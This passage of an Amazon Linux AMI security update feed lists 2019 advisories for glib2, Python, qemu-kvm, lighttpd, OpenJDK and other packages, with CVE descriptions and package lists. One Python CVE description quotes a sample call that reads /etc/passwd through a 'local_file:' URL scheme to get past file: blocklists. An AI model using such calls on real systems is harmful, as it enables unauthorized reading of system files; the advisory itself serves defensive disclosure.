name="rubygem24-bigdecimal" version="1.3.2" release="1.30.11.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-bigdecimal-1.3.2-1.30.11.amzn1.i686.rpm</filename></package><package name="ruby24-debuginfo" version="2.4.5" release="1.30.11.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-debuginfo-2.4.5-1.30.11.amzn1.i686.rpm</filename></package><package name="rubygem24-io-console" version="0.4.6" release="1.30.11.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-io-console-0.4.6-1.30.11.amzn1.i686.rpm</filename></package><package name="rubygem24-psych" version="2.2.2" release="1.30.11.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-psych-2.2.2-1.30.11.amzn1.i686.rpm</filename></package><package name="ruby24-libs" version="2.4.5" release="1.30.11.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-libs-2.4.5-1.30.11.amzn1.i686.rpm</filename></package><package name="rubygem24-xmlrpc" version="0.2.1" release="1.30.11.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-xmlrpc-0.2.1-1.30.11.amzn1.i686.rpm</filename></package><package name="ruby24-devel" version="2.4.5" release="1.30.11.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-devel-2.4.5-1.30.11.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1256</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1256: medium priority package update for glib2</title><issued date="2019-08-07 23:00:00" /><updated date="2019-08-12 18:19:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-12450:
file_copy_fallback in gio/gfile.c in GNOME GLib 2.15.0 through 2.61.1 does not properly restrict file permissions while a copy operation is in progress. Instead, default permissions are used.
1719141:
CVE-2019-12450 glib2: file_copy_fallback in gio/gfile.c in GNOME GLib does not properly restrict file permissions while a copy operation is in progress
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12450" title="" id="CVE-2019-12450" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="glib2-debuginfo" version="2.36.3" release="5.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/glib2-debuginfo-2.36.3-5.21.amzn1.x86_64.rpm</filename></package><package name="glib2" version="2.36.3" release="5.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/glib2-2.36.3-5.21.amzn1.x86_64.rpm</filename></package><package name="glib2-fam" version="2.36.3" release="5.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/glib2-fam-2.36.3-5.21.amzn1.x86_64.rpm</filename></package><package name="glib2-doc" version="2.36.3" release="5.21.amzn1" epoch="0" arch="noarch"><filename>Packages/glib2-doc-2.36.3-5.21.amzn1.noarch.rpm</filename></package><package name="glib2-devel" version="2.36.3" release="5.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/glib2-devel-2.36.3-5.21.amzn1.x86_64.rpm</filename></package><package name="glib2" version="2.36.3" release="5.21.amzn1" epoch="0" arch="i686"><filename>Packages/glib2-2.36.3-5.21.amzn1.i686.rpm</filename></package><package name="glib2-fam" version="2.36.3" release="5.21.amzn1" epoch="0" arch="i686"><filename>Packages/glib2-fam-2.36.3-5.21.amzn1.i686.rpm</filename></package><package name="glib2-debuginfo" version="2.36.3" release="5.21.amzn1" epoch="0" arch="i686"><filename>Packages/glib2-debuginfo-2.36.3-5.21.amzn1.i686.rpm</filename></package><package name="glib2-devel" version="2.36.3" release="5.21.amzn1" epoch="0" arch="i686"><filename>Packages/glib2-devel-2.36.3-5.21.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1257</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1257: low priority package update for GraphicsMagick</title><issued date="2019-08-07 23:01:00" /><updated date="2019-08-12 18:21:00" /><severity>low</severity><description /><references /><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="GraphicsMagick-doc" version="1.3.32" release="1.16.amzn1" epoch="0" arch="noarch"><filename>Packages/GraphicsMagick-doc-1.3.32-1.16.amzn1.noarch.rpm</filename></package><package name="GraphicsMagick-perl" version="1.3.32" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-perl-1.3.32-1.16.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick" version="1.3.32" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-1.3.32-1.16.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-c++" version="1.3.32" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-c++-1.3.32-1.16.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-c++-devel" version="1.3.32" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-c++-devel-1.3.32-1.16.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-debuginfo" version="1.3.32" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-debuginfo-1.3.32-1.16.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-devel" version="1.3.32" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-devel-1.3.32-1.16.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick" version="1.3.32" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-1.3.32-1.16.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-devel" version="1.3.32" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-devel-1.3.32-1.16.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-c++" version="1.3.32" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-c++-1.3.32-1.16.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-debuginfo" version="1.3.32" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-debuginfo-1.3.32-1.16.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-perl" version="1.3.32" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-perl-1.3.32-1.16.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-c++-devel" version="1.3.32" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-c++-devel-1.3.32-1.16.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1258</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1258: important priority package update for python27</title><issued date="2019-08-07 23:02:00" /><updated date="2019-08-12 18:22:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-9948:
urllib in Python 2.x through 2.7.16 supports the local_file: scheme, which makes it easier for remote attackers to bypass protection mechanisms that blacklist file: URIs, as demonstrated by triggering a urllib.urlopen(&#039;local_file:///etc/passwd&#039;) call.
1695570:
CVE-2019-9948 python: Undocumented local_file protocol allows remote attackers to bypass protection mechanisms
CVE-2019-10160:
A security regression of CVE-2019-9636 was discovered in python, since commit d537ab0ff9767ef024f26246899728f0116b1ec3, which still allows an attacker to exploit CVE-2019-9636 by abusing the user and password parts of a URL. When an application parses user-supplied URLs to store cookies, authentication credentials, or other kind of information, it is possible for an attacker to provide specially crafted URLs to make the application locate host-related information (e.g. cookies, authentication data) and send them to a different host than where it should, unlike if the URLs had been correctly parsed. The result of an attack may vary based on the application.
1718388:
CVE-2019-10160 python: regression of CVE-2019-9636 due to functional fix to allow port numbers in netloc
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10160" title="" id="CVE-2019-10160" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9948" title="" id="CVE-2019-9948" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python27" version="2.7.16" release="1.129.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-2.7.16-1.129.amzn1.x86_64.rpm</filename></package><package name="python27-libs" version="2.7.16" release="1.129.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libs-2.7.16-1.129.amzn1.x86_64.rpm</filename></package><package name="python27-test" version="2.7.16" release="1.129.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-test-2.7.16-1.129.amzn1.x86_64.rpm</filename></package><package name="python27-devel" version="2.7.16" release="1.129.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-devel-2.7.16-1.129.amzn1.x86_64.rpm</filename></package><package name="python27-tools" version="2.7.16" release="1.129.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-tools-2.7.16-1.129.amzn1.x86_64.rpm</filename></package><package name="python27-debuginfo" version="2.7.16" release="1.129.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-debuginfo-2.7.16-1.129.amzn1.x86_64.rpm</filename></package><package name="python27" version="2.7.16" release="1.129.amzn1" epoch="0" arch="i686"><filename>Packages/python27-2.7.16-1.129.amzn1.i686.rpm</filename></package><package name="python27-devel" version="2.7.16" release="1.129.amzn1" epoch="0" arch="i686"><filename>Packages/python27-devel-2.7.16-1.129.amzn1.i686.rpm</filename></package><package name="python27-debuginfo" version="2.7.16" release="1.129.amzn1" epoch="0" arch="i686"><filename>Packages/python27-debuginfo-2.7.16-1.129.amzn1.i686.rpm</filename></package><package name="python27-tools" version="2.7.16" release="1.129.amzn1" epoch="0" arch="i686"><filename>Packages/python27-tools-2.7.16-1.129.amzn1.i686.rpm</filename></package><package name="python27-libs" version="2.7.16" release="1.129.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libs-2.7.16-1.129.amzn1.i686.rpm</filename></package><package name="python27-test" version="2.7.16" release="1.129.amzn1" epoch="0" arch="i686"><filename>Packages/python27-test-2.7.16-1.129.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1259</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1259: important priority package update for python34 python35 python36</title><issued date="2019-08-07 23:03:00" /><updated date="2019-08-12 18:22:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-10160:
A security regression of CVE-2019-9636 was discovered in python, since commit d537ab0ff9767ef024f26246899728f0116b1ec3, which still allows an attacker to exploit CVE-2019-9636 by abusing the user and password parts of a URL. When an application parses user-supplied URLs to store cookies, authentication credentials, or other kind of information, it is possible for an attacker to provide specially crafted URLs to make the application locate host-related information (e.g. cookies, authentication data) and send them to a different host than where it should, unlike if the URLs had been correctly parsed. The result of an attack may vary based on the application.
1718388:
CVE-2019-10160 python: regression of CVE-2019-9636 due to functional fix to allow port numbers in netloc
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10160" title="" id="CVE-2019-10160" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python34-devel" version="3.4.10" release="1.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-devel-3.4.10-1.47.amzn1.x86_64.rpm</filename></package><package name="python34-test" version="3.4.10" release="1.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-test-3.4.10-1.47.amzn1.x86_64.rpm</filename></package><package name="python34-debuginfo" version="3.4.10" release="1.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-debuginfo-3.4.10-1.47.amzn1.x86_64.rpm</filename></package><package name="python34-tools" version="3.4.10" release="1.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-tools-3.4.10-1.47.amzn1.x86_64.rpm</filename></package><package name="python34-libs" version="3.4.10" release="1.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-libs-3.4.10-1.47.amzn1.x86_64.rpm</filename></package><package name="python34" version="3.4.10" release="1.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-3.4.10-1.47.amzn1.x86_64.rpm</filename></package><package name="python34-tools" version="3.4.10" release="1.47.amzn1" epoch="0" arch="i686"><filename>Packages/python34-tools-3.4.10-1.47.amzn1.i686.rpm</filename></package><package name="python34-devel" version="3.4.10" release="1.47.amzn1" epoch="0" arch="i686"><filename>Packages/python34-devel-3.4.10-1.47.amzn1.i686.rpm</filename></package><package name="python34-test" version="3.4.10" release="1.47.amzn1" epoch="0" arch="i686"><filename>Packages/python34-test-3.4.10-1.47.amzn1.i686.rpm</filename></package><package name="python34-libs" version="3.4.10" release="1.47.amzn1" epoch="0" arch="i686"><filename>Packages/python34-libs-3.4.10-1.47.amzn1.i686.rpm</filename></package><package name="python34-debuginfo" version="3.4.10" release="1.47.amzn1" epoch="0" arch="i686"><filename>Packages/python34-debuginfo-3.4.10-1.47.amzn1.i686.rpm</filename></package><package name="python34" version="3.4.10" release="1.47.amzn1" epoch="0" arch="i686"><filename>Packages/python34-3.4.10-1.47.amzn1.i686.rpm</filename></package><package name="python35-libs" version="3.5.7" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-libs-3.5.7-1.23.amzn1.x86_64.rpm</filename></package><package name="python35" version="3.5.7" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-3.5.7-1.23.amzn1.x86_64.rpm</filename></package><package name="python35-test" version="3.5.7" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-test-3.5.7-1.23.amzn1.x86_64.rpm</filename></package><package name="python35-tools" version="3.5.7" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-tools-3.5.7-1.23.amzn1.x86_64.rpm</filename></package><package name="python35-debuginfo" version="3.5.7" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-debuginfo-3.5.7-1.23.amzn1.x86_64.rpm</filename></package><package name="python35-devel" version="3.5.7" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-devel-3.5.7-1.23.amzn1.x86_64.rpm</filename></package><package name="python35-debuginfo" version="3.5.7" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/python35-debuginfo-3.5.7-1.23.amzn1.i686.rpm</filename></package><package name="python35-test" version="3.5.7" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/python35-test-3.5.7-1.23.amzn1.i686.rpm</filename></package><package name="python35-tools" version="3.5.7" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/python35-tools-3.5.7-1.23.amzn1.i686.rpm</filename></package><package name="python35" version="3.5.7" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/python35-3.5.7-1.23.amzn1.i686.rpm</filename></package><package name="python35-devel" version="3.5.7" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/python35-devel-3.5.7-1.23.amzn1.i686.rpm</filename></package><package name="python35-libs" version="3.5.7" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/python35-libs-3.5.7-1.23.amzn1.i686.rpm</filename></package><package name="python36-tools" version="3.6.8" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-tools-3.6.8-1.14.amzn1.x86_64.rpm</filename></package><package name="python36-test" version="3.6.8" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-test-3.6.8-1.14.amzn1.x86_64.rpm</filename></package><package name="python36-debug" version="3.6.8" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-debug-3.6.8-1.14.amzn1.x86_64.rpm</filename></package><package name="python36-debuginfo" version="3.6.8" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-debuginfo-3.6.8-1.14.amzn1.x86_64.rpm</filename></package><package name="python36" version="3.6.8" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-3.6.8-1.14.amzn1.x86_64.rpm</filename></package><package name="python36-devel" version="3.6.8" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-devel-3.6.8-1.14.amzn1.x86_64.rpm</filename></package><package name="python36-libs" version="3.6.8" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-libs-3.6.8-1.14.amzn1.x86_64.rpm</filename></package><package name="python36-devel" version="3.6.8" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/python36-devel-3.6.8-1.14.amzn1.i686.rpm</filename></package><package name="python36-tools" version="3.6.8" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/python36-tools-3.6.8-1.14.amzn1.i686.rpm</filename></package><package name="python36-debuginfo" version="3.6.8" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/python36-debuginfo-3.6.8-1.14.amzn1.i686.rpm</filename></package><package name="python36-debug" version="3.6.8" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/python36-debug-3.6.8-1.14.amzn1.i686.rpm</filename></package><package name="python36-libs" version="3.6.8" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/python36-libs-3.6.8-1.14.amzn1.i686.rpm</filename></package><package name="python36" version="3.6.8" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/python36-3.6.8-1.14.amzn1.i686.rpm</filename></package><package name="python36-test" version="3.6.8" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/python36-test-3.6.8-1.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1260</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1260: important priority package update for qemu-kvm</title><issued date="2019-08-07 23:12:00" /><updated date="2019-08-12 18:23:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-11091:
Uncacheable memory on some microprocessors utilizing speculative execution may allow an authenticated user to potentially enable information disclosure via a side channel with local access.
1705312:
CVE-2019-11091 hardware: Microarchitectural Data Sampling Uncacheable Memory (MDSUM)
CVE-2018-12130:
A flaw was found in the implementation of the &quot;fill buffer&quot;, a mechanism used by modern CPUs when a cache-miss is made on L1 CPU cache. If an attacker can generate a load operation that would create a page fault, the execution will continue speculatively with incorrect data from the fill buffer while the data is fetched from higher level caches. This response time can be measured to infer data in the fill buffer.
1646784:
CVE-2018-12130 hardware: Microarchitectural Fill Buffer Data Sampling (MFBDS)
CVE-2018-12127:
Microprocessors use a load port subcomponent to perform load operations from memory or IO. During a load operation, the load port receives data from the memory or IO subsystem and then provides the data to the CPU registers and operations in the CPUs pipelines. Stale load operations results are stored in the &#039;load port&#039; table until overwritten by newer operations. Certain load-port operations triggered by an attacker can be used to reveal data about previous stale requests leaking data back to the attacker via a timing side-channel.
1667782:
CVE-2018-12127 hardware: Micro-architectural Load Port Data Sampling - Information Leak (MLPDS)
CVE-2018-12126:
Modern Intel microprocessors implement hardware-level micro-optimizations to improve the performance of writing data back to CPU caches. The write operation is split into STA (STore Address) and STD (STore Data) sub-operations. These sub-operations allow the processor to hand-off address generation logic into these sub-operations for optimized writes. Both of these sub-operations write to a shared distributed processor structure called the &#039;processor store buffer&#039;. As a result, an unprivileged attacker could use this flaw to read private data resident within the CPU&#039;s processor store buffer.
1646781:
CVE-2018-12126 hardware: Microarchitectural Store Buffer Data Sampling (MSBDS)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12126" title="" id="CVE-2018-12126" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12127" title="" id="CVE-2018-12127" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12130" title="" id="CVE-2018-12130" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11091" title="" id="CVE-2019-11091" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="qemu-kvm" version="1.5.3" release="156.16.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-1.5.3-156.16.amzn1.x86_64.rpm</filename></package><package name="qemu-img" version="1.5.3" release="156.16.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-img-1.5.3-156.16.amzn1.x86_64.rpm</filename></package><package name="qemu-kvm-debuginfo" version="1.5.3" release="156.16.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-debuginfo-1.5.3-156.16.amzn1.x86_64.rpm</filename></package><package name="qemu-kvm-common" version="1.5.3" release="156.16.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-common-1.5.3-156.16.amzn1.x86_64.rpm</filename></package><package name="qemu-kvm-tools" version="1.5.3" release="156.16.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-tools-1.5.3-156.16.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1261</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1261: medium priority package update for 389-ds-base</title><issued date="2019-08-07 23:13:00" /><updated date="2019-08-12 18:23:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-3883:
It was found that encrypted connections did not honor the &#039;ioblocktimeout&#039; parameter to end blocking requests. As a result, an unauthenticated attacker could repeatedly start a sufficient number of encrypted connections to block all workers, resulting in a denial of service.
1693612:
CVE-2019-3883 389-ds-base: DoS via hanging secured connections
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3883" title="" id="CVE-2019-3883" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="389-ds-base-snmp" version="1.3.8.4" release="25.1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-snmp-1.3.8.4-25.1.62.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-devel" version="1.3.8.4" release="25.1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-devel-1.3.8.4-25.1.62.amzn1.x86_64.rpm</filename></package><package name="389-ds-base" version="1.3.8.4" release="25.1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-1.3.8.4-25.1.62.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-libs" version="1.3.8.4" release="25.1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-libs-1.3.8.4-25.1.62.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.8.4" release="25.1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-debuginfo-1.3.8.4-25.1.62.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-devel" version="1.3.8.4" release="25.1.62.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-devel-1.3.8.4-25.1.62.amzn1.i686.rpm</filename></package><package name="389-ds-base-libs" version="1.3.8.4" release="25.1.62.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-libs-1.3.8.4-25.1.62.amzn1.i686.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.8.4" release="25.1.62.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-debuginfo-1.3.8.4-25.1.62.amzn1.i686.rpm</filename></package><package name="389-ds-base" version="1.3.8.4" release="25.1.62.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-1.3.8.4-25.1.62.amzn1.i686.rpm</filename></package><package name="389-ds-base-snmp" version="1.3.8.4" release="25.1.62.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-snmp-1.3.8.4-25.1.62.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1265</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1265: medium priority package update for lighttpd</title><issued date="2019-08-07 23:16:00" /><updated date="2024-09-13 01:16:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-25103:
There exists use-after-free vulnerabilities in lighttpd <= 1.4.50 request parsing which might read from invalid pointers to memory used in the same request, not from other requests.
CVE-2018-19052:
An issue was discovered in mod_alias_physical_handler in mod_alias.c in lighttpd before 1.4.50. There is potential ../ path traversal of a single directory above an alias target, with a specific mod_alias configuration where the matched alias lacks a trailing '/' character, but the alias target filesystem path does have a trailing '/' character.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19052" title="" id="CVE-2018-19052" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-25103" title="" id="CVE-2018-25103" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="lighttpd" version="1.4.53" release="1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-1.4.53-1.36.amzn1.x86_64.rpm</filename></package><package name="lighttpd-mod_geoip" version="1.4.53" release="1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-mod_geoip-1.4.53-1.36.amzn1.x86_64.rpm</filename></package><package name="lighttpd-mod_authn_pam" version="1.4.53" release="1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-mod_authn_pam-1.4.53-1.36.amzn1.x86_64.rpm</filename></package><package name="lighttpd-mod_authn_gssapi" version="1.4.53" release="1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-mod_authn_gssapi-1.4.53-1.36.amzn1.x86_64.rpm</filename></package><package name="lighttpd-mod_mysql_vhost" version="1.4.53" release="1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-mod_mysql_vhost-1.4.53-1.36.amzn1.x86_64.rpm</filename></package><package name="lighttpd-debuginfo" version="1.4.53" release="1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-debuginfo-1.4.53-1.36.amzn1.x86_64.rpm</filename></package><package name="lighttpd-fastcgi" version="1.4.53" release="1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-fastcgi-1.4.53-1.36.amzn1.x86_64.rpm</filename></package><package name="lighttpd-mod_authn_mysql" version="1.4.53" release="1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-mod_authn_mysql-1.4.53-1.36.amzn1.x86_64.rpm</filename></package><package name="lighttpd-fastcgi" version="1.4.53" release="1.36.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-fastcgi-1.4.53-1.36.amzn1.i686.rpm</filename></package><package name="lighttpd-debuginfo" version="1.4.53" release="1.36.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-debuginfo-1.4.53-1.36.amzn1.i686.rpm</filename></package><package name="lighttpd-mod_authn_pam" version="1.4.53" release="1.36.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-mod_authn_pam-1.4.53-1.36.amzn1.i686.rpm</filename></package><package name="lighttpd" version="1.4.53" release="1.36.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-1.4.53-1.36.amzn1.i686.rpm</filename></package><package name="lighttpd-mod_mysql_vhost" version="1.4.53" release="1.36.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-mod_mysql_vhost-1.4.53-1.36.amzn1.i686.rpm</filename></package><package name="lighttpd-mod_geoip" version="1.4.53" release="1.36.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-mod_geoip-1.4.53-1.36.amzn1.i686.rpm</filename></package><package name="lighttpd-mod_authn_gssapi" version="1.4.53" release="1.36.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-mod_authn_gssapi-1.4.53-1.36.amzn1.i686.rpm</filename></package><package name="lighttpd-mod_authn_mysql" version="1.4.53" release="1.36.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-mod_authn_mysql-1.4.53-1.36.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1266</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1266: important priority package update for java-1.8.0-openjdk</title><issued date="2019-08-07 23:35:00" /><updated date="2019-08-12 18:25:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-2698:
Vulnerability in the Java SE component of Oracle Java SE (subcomponent: 2D). Supported versions that are affected are Java SE: 7u211 and 8u202. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE. Successful attacks of this vulnerability can result in takeover of Java SE. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 8.1 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H).
1700447:
CVE-2019-2698 OpenJDK: Font layout engine out of bounds access setCurrGlyphID() (2D, 8219022)
CVE-2019-2684:
